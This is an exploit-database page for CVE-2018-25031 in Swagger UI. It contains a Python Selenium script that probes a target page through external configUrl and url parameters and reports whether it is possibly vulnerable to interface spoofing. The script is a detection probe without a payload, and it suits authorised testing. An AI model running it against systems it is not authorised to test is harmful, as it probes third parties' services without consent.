Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information Exploit

Published: 20 Apr 2023 00:00:00
Reported by: Rafael Cintra Lopes
Type: zdt
Source: 0day.today

Swagger UI 4.1.3 - User Interface Misrepresentation exploit with Seleniu

Related

Packet Storm: Swagger UI 4.1.3 Critical Information Misrepresentation (20 Apr 2023 00:00)
IBM Security Bulletins: Security Bulletin: Swagger-ui as used by IBM QRadar Advisor With Watson App is vulnerable to spoofing attacks (CVE-2018-25031) (15 Feb 2023 13:45)
IBM Security Bulletins: Security Bulletin: Vulnerabilities in Springfox swagger affect IBM Rational ClearQuest (29 Sep 2023 17:27)
IBM Security Bulletins: Security Bulletin: A security vulnerability has been identified in SwaggerUI shipped with IBM Tivoli Netcool Impact (CVE-2018-25031, 221508) (6 Jul 2022 05:21)
IBM Security Bulletins: Security Bulletin: Open Source Dependency Vulnerability (15 May 2023 17:52)
IBM Security Bulletins: Security Bulletin: Liberty for Java for IBM Cloud is vulnerable to spoofing attacks and clickjacking due to swagger-ui (CVE-2018-25031, CVE-2021-46708) (7 Oct 2022 16:01)
IBM Security Bulletins: Security Bulletin: IBM WebSphere Application Server Liberty, which is bundled in IBM Cloud Pak for Applications, is vulnerable to spoofing attacks and clickjacking due to swagger-ui (CVE-2018-25031, CVE-2021-46708) (19 Apr 2022 20:38)
IBM Security Bulletins: Security Bulletin: IBM WebSphere Application Server Liberty for IBM i is vulnerable to spoofing and clickjacking attacks due to swagger-ui (CVE-2018-25031, CVE-2021-46708) (8 Apr 2022 15:41)
IBM Security Bulletins: Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server Liberty shipped with IBM Tivoli Netcool Impact (CVE-2018-25031, CVE-2021-46708) (28 Jul 2022 06:16)
IBM Security Bulletins: Security Bulletin: Rational Asset Analyzer is affected by two WebSphere Application Server vulnerabilities (CVE-2018-25031, CVE-2021-46708) (5 May 2022 16:56)

# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/

# Usage: python swagger-exploit.py https://[swagger-page].com

from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import time
import json
import sys

if __name__ == "__main__":

	# Exit with the usage line instead of an IndexError when no target is given
	if len(sys.argv) != 2:
		sys.exit("Usage: python swagger-exploit.py https://[swagger-page].com")

	target = sys.argv[1]

	options = webdriver.ChromeOptions()
	options.add_argument("--headless")
	options.add_argument("--ignore-certificate-errors")
	options.add_argument("--log-level=3")
	options.add_experimental_option("excludeSwitches", ["enable-logging"])
	# Enable Chrome performance logging so the network events can be read back later.
	# Set on the options object: newer Selenium 4 releases no longer accept
	# the desired_capabilities argument of webdriver.Chrome().
	options.set_capability("goog:loggingPrefs", {"performance": "ALL"})

	# Browser webdriver path
	drive_service = Service("C:/chromedriver.exe")

	driver = webdriver.Chrome(service=drive_service, options=options)

	driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
	time.sleep(10)
	driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
	time.sleep(10)

	logs = driver.get_log("performance")

	with open("log_file.json", "w", encoding="utf-8") as f:
		f.write("[")

		for log in logs:
			log_file = json.loads(log["message"])["message"]

			if("Network.response" in log_file["method"]
					or "Network.request" in log_file["method"]
					or "Network.webSocket" in log_file["method"]):

				f.write(json.dumps(log_file)+",")
		f.write("{}]")

	driver.quit()

	json_file_path = "log_file.json"
	with open(json_file_path, "r", encoding="utf-8") as f:
		logs = json.loads(f.read())

	for log in logs:
		try:
			url = log["params"]["request"]["url"]

			if(url == "https://petstore.swagger.io/v2/hacked1.json"):
				print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
			
			if(url == "https://petstore.swagger.io/v2/hacked2.json"):
				print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")

		except KeyError:
			# Not a request event (no params.request.url), or the trailing {} entry
			pass

Vulners AI Score: 5.9 (Medium risk)
EPSS: 0.004